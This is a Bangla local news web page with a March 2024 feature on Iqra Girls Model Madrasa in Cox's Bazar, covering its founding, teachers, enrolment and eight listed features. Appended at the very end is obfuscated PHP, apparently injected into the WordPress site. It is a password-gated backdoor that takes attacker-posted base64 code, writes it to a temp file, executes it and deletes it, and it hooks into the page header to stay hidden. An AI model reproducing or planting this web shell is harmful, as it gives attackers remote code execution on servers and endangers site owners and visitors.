• বুধবার, ১৯ জুন ২০২৪, ০৮:০০ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

ইকরা গার্লস মাদ্রাসা প্রচলিত ও ইসলামি শিক্ষার আলোকিত নারী তৈরীর কারখানা

ফরিদুল মোস্তফা খান:
আপডেট : সোমবার, ১১ মার্চ, ২০২৪

ফরিদুল মোস্তফা খান :


প্রতিষ্ঠার খুব স্বল্প সময়ে প্রচলিত ও ইসলামি শিক্ষার সমন্বয়ে পরিচালিত ইকরা গার্লস মডেল মাদ্রাসা আদর্শ

নারী তৈরীতে জ্ঞানের আলো ছড়াচ্ছে।

 

কক্সবাজার পৌরসভার ০১ নাম্বার ওয়ার্ড সমিতি পাড়া বাজারের পাশেই ২০১৬ সালে প্রতিষ্ঠানটি স্থাপিত হয়।

 

এলাকার বিশিষ্ট শিক্ষানুরাগী আলোকিত মানুষ গড়ার কারিগর এজাবত উল্লাহ কুতুবী  সহ আরো কিছু শিক্ষানুরাগী ব্যক্তিদের আন্তরিক প্রচেষ্টায় প্রতিষ্ঠানটির যাত্রা শুরু হয়।

 

একদিকে পৃথিবীর দীর্ঘ বেলাভূমি কক্সবাজার সৈকত, অপর দিকে বঙ্গোপসাগরের অর্থনৈতিক তীর নাজিরারটেক শুটকি পল্লী।

অন্যদিকে সমিতি পাড়া, কুতুবদিয়া পাড়ার মাঝখানেই  অত্যন্ত মনোরম পরিবেশে গড়ে ওঠা ইকরা গার্লস মডেল মাদ্রাসার প্রিন্সিপাল হিসেবে দায়িত্ব পালন করছেন,মিসেস রুমানা আফাজ(কামিল এমএ -ফাস্ট ক্লাস)।

 

বর্তমানে উক্ত মাদ্রাসার শিক্ষক রয়েছেন ১৯ জন।

শিক্ষার্থী প্রায় ৪শ জনের মত।

 

প্লে থেকে দাখিল নবম শ্রেণী পর্যন্ত অধ্যায়নের সুযোগ সম্বলিত উক্ত মাদ্রাসার প্রতি ক্লাসে আসন সংখ্যা ৩৫ জন।

 জানাগেছে,ইকরা গার্লস মডেল মাদ্রাসার বিশেষত্ব হচ্ছে যথাক্রমে –

১। সহীহ্ কুরআন শিক্ষার জন্য আন্তর্জাতিক মানের ক্বারী ও হাফেজা দ্বারা বাধ্যতামূলক মর্নিং কুরআন ক্লাস।

 

২। ল্যাংগুয়েজ ক্লাব (আরবী ও ইংরেজী)

 

৩। জাতীয় শিক্ষাক্রম ও পাঠ্যপুস্তক বোর্ড এর পূর্ণ অনুসরণ সহ পাঠ সহায়ক- সাধারণ জ্ঞান, সাহিত্য, বিজ্ঞান, জীবনী ও শিক্ষার্থীদের উপযোগী ম্যাগাজিন-পত্রিকা এবং প্রজেক্টরের মাধ্যমে মননশীল সংস্কৃতি ও বিনোদনের ব্যবস্থা।

 

৪। নৈতিকমান উন্নয়ন ও সৃজনশীল প্রতিভা বিকাশে নিয়মিত মোটিভেশন ক্লাস।

 

৫। দূর্বল শিক্ষার্থীদের জন্য ফাউন্ডেশন ক্লাস।

 

৬। শিক্ষার্থীদের সার্বক্ষণিক নিরাপত্তা ও খেলাধুলার প্রশস্ত মাঠ।

 

৭। সাপ্তাহিক নৈতিক শিক্ষার প্রাক্টিক্যাল অনুশীলন ও সাহিত্য সাংস্কৃতিক কার্যক্রম।

 

৮। মনোরম পরিবেশ ও নিজস্ব ক্যাম্পাস।

 

সম্প্রতি কক্সবাজারবাণীর পক্ষ থেকে উক্ত মাদ্রাসা সরেজমিনে পরিদর্শনে দেখা গেছে,অত্যান্ত সুশৃঙ্খলভাবে শিক্ষক ও শিক্ষার্থীরা পড়াশুনায় ব্যস্ত রয়েছেন।

 

জানাগেছে,এতে প্রতিষ্ঠানে একাডেমিক কার্যক্রম সুচারুরূপে পরিচালনার জন্য একটি মনিটরিং ও গবেষণা সেল রয়েছে।

 

যার প্রধান কাজ হচ্ছে শিক্ষার্থীদের পড়ালেখার পরিবেশ, সুযোগ-সুবিধা পর্যবেক্ষণ, মূল্যায়ন, সুপারিশ প্রণয়ন এবং শিক্ষা পদ্ধতির উন্নয়নে গবেষণা করা। উক্ত মনিটরিং সেল প্রতিষ্ঠানের অভিভাবকসহ সচেতন মহল থেকে নিয়মিত পরামর্শ গ্রহণ করে বিচার বিশ্লেষণ পূর্বক প্রয়োজনীয় পদক্ষেপ গ্রহণ ও বাস্তবায়ন করা হয়।

 


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ৮:০০)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}